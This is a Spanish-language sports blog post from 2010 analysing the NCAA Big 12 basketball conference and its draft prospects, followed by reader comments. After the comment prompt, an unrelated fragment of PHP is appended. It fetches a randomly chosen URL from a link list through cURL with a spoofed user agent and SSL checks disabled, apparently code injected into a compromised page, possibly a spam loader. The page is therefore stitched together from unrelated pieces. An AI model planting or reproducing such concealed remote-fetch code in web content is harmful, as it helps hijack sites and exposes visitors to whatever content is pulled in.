Análisis NCAA – Big 12

27 de February de 2010 por kantonyo

Continuamos nuestro repaso de la temporada universitaria con la Conferencia Big 12. Compuesta por doce equipos situados en el centro de los Estados Unidos.

La Universidad de Kansas, después de un balance de 27 victorias y 1 derrota, se ha situado como los máximos favoritos al título de la NCAA junto con Kentucky. El pívot Cole Aldrich, candidato a top 10 del draft de 2010, decidió aguantar un año más su salto a la NBA para poder aspirar a su segundo título de la NCAA, después del conseguido en 2008 junto con Brandon Rush, Darrell Arthur y Mario Chalmers. Aldrich es un pívot de 2.11, buen defensor y con un salto potente que le proporciona una gran capacidad reboteadora, recuerda bastante a Kevin Love pero no llega a tener las cualidades ofensivas del jugador los Timberwolves. En el juego exterior, los Jayhawks disponen de Sherron Collins, base de 1.80, que destaca por su fortaleza física y el freshman, Xavier Henry. El escolta de 18 años es considerado uno de los mejores jugadores de primer año y todo indica que será elegido en primera ronda del draft. A falta de tres partidos para el final de la Regular Season, Kansas tiene prácticamente decidido el título.

A pesar del dominio de los Jayhawks, su eterno rival, los Wildcats, no se lo ha puesto nada fácil como se pudo ver en el último enfrentamiento entre ambos que se decidió en la prórroga. Con 23 victorias y 4 derrotas, Kansas State se ha situado en el puesto 6 del ranking AP contra todo pronóstico. En los últimos diez años sólo en 2008 consiguió clasificarse para el March Madness de la mano de Michael Beasley. Su pareja exterior, Jacob Pullen y el puertorriqueño Denis Clemente son la principal arma del equipo. La carencia de jugadores altos se contrarresta con la capacidad atlética de sus aleros Curtis Kelly y Jamar Samuels. El gran rendimiento del equipo no ha ayudado a que ninguno de sus jugadores aparezca en las quinielas del draft de 2010.

La gran decepción de la conferencia, son los Longhorns de Texas. Después de un inicio perfecto con 17 victorias consecutivas, siendo derrotados por primera vez el 18 de enero ante Kansas State,  Texas ha tenido un último mes pésimo, con un balance de 5 victorias y 6 derrotas que le han apartado de la lucha por la Big 12 y de los puestos altos del ranking AP. Disponen de un gran poderío en el juego interior con el pívot Dexter Pittman y el ala-pívot Damion James. También destacan la pareja de freshman Avery Bradley y Jordan Hamilton que darán el salto a la NBA en el año 2011. Actualmente están en el puesto 21 del ranking AP.

Otros jugadores que debemos tener en cuenta en la conferencia Big 12 son: James Anderson, escolta de Oklahoma State que promedia 22 puntos por partido, el pívot de Baylor Ekpe Udoh, posible top 15 en el draft, Craig Brackins, ala-pívot de tercer año de Iowa State, y también, el escolta de segundo año de los Sooners de Oklahoma, Willie Warren, que este año sin Blake Griffin ha bajado bastante su rendimiento.

Quinteto Ideal

C – Cole Aldrich (Kansas)
SF – Damion James (Texas)
SF – Xavier Henry (Kansas)
SG – James Anderson (Oklahoma St)
PG – Jacob Pullen (Kansas State)

Otros jugadores a seguir

– Centers: Ekpe Udoh (Baylor), Dexter Pittman (Texas).
– Forwards: Marcus Morris (Kansas), Jamar Samuels (Kansas St), Curtis Kelly (Kansas St), Mike Singletary (Texas Tech), Craig Brackins (Iowa St), Marquis Gilstrap (Iowa St).
-Guards: Sherron Collins (Kansas), Denis Clemente (Kansas St), Kim English (Missouri), LaceDarius Dunn (Baylor), Avery Bradley (Texas), Jordan Hamilton (Texas), Donald Sloan (Texas A&M), Willie Warren (Oklahoma), Tommy Mason-Griffin (Oklahoma), Cory Higgins (Colorado).

Próximos partidos clave

27 Febrero: Missouri – Kansas State
27 Febrero: Texas – Texas A&M
3 Marzo: Kansas State – Kansas
6 Marzo: Kansas – Missouri
6 Marzo: Baylor – Texas

Comenta

7 comentarios a esta entrada

  1. jhc dice:
    #1

    se habla muy bien de Xabier Henry, veremos k tal es puede ser una buena apuesta para equipos que elijan del 5 al 10, me encanta de center dexter pittman me parece una buena apuesta para equipos con interiores flojos como Sacramento o golden state pero seria arriesgado elegirlo tan adelante

      Citar

  2. Dantley2 dice:
    #2

    Que buena pinta tiene Kansas. Lo de Aldrich, no me recuerda tanto a Love, dista mucho de tener la clase de Love, pero sí parece que físicamente es muy potente. Por comparación me iría más a un Dalembert con mucha más cabeza o un Biedrins algo más dotado ofensivamente. Puede ser un buen complemento si tiene gente anotadora acompañando

      Citar

  3. Viva_Dirk dice:
    #3

    Aldrich me gusta mucho y segun veo este draft deberia ser top-5 fijo. Si finalmente traspasan a Jefferson, seria una buena adquisición para los Wolves.

      Citar

  4. kantonyo dice:
    #4

    Cuando digo que recuerda a Love, quiero dejar claro que no es que sean jugadores parecidos, pero por físico y por trayectoria, siempre se les ha comparado.

    Aldrich nunca tendrá el tiro de tres puntos que tiene Love, y tendrá que mejorar su tiro de media distancia. Pero es mucho mejor defensor, tiene más caracter defensivo, es un gran taponador al contrario de Love.

    Aunque sigo pensando que Cole debe ser top 5 del draft, este año me han defraudado sus números, que ha reducido a 11 puntos y 10 rebotes. Posiblemente debido al mayor protagonismo de Henry, Collins y Morris. Esperaba mucho más de él.

    Viendo el gran éxito de jugadores como Love, Gasol o Brook y Robin Lopez. Creo que Aldrich lo hará bastante bien en la NBA, y que será clave este dato en que sea elegido muy arriba. A los Wolves le vendría de lujo, tanto deportivamente como económicamente, juntar a Love y Aldrich, los dos pívots más prometedores de su generación, y encima contando que Aldrich es de Minnesota, mejor aún.

      Citar

  5. kantonyo dice:
    #5

    Respecto a Xavier Henry. Estamos hablando de uno de los jugadores con más talento de este año. Tiene un potencial enorme. Es un escolta anotador, con un buen tiro de larga distancia, tiene un trato con la pelota exquisito y sus movimientos son elegantes, como el de un bailarín. Al ser jugador de primer año, veremos si se decide dar el salto este año a la NBA, si lo hace estará más arriba seguro del puesto 20 que le dan los mockdraft. Sólo tiene 18 años.

    Por cierto, ayer segunda derrota de Kansas, ante Oklahoma State, con 27 puntos y 8 rebotes de James Anderson, otra perla a seguir este año.

      Citar

  6. Txusma dice:
    #6

    Ya hace tiempo que se oye hablar de Cole Aldrich pero si me dices que su nivel defensivo es mejor que el de Love entonces habra que seguirlo aún más de cerca. Aún es más bestia parda reboteando que el de los Wolves?

      Citar

  7. kantonyo dice:
    #7

    no es que sea mejor reboteando, sino que es mejor defensor sin balón debajo del tablero. Es un gran taponador y un gran incordio para el atacante. Tiene los brazos más largos que Kevin Love.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>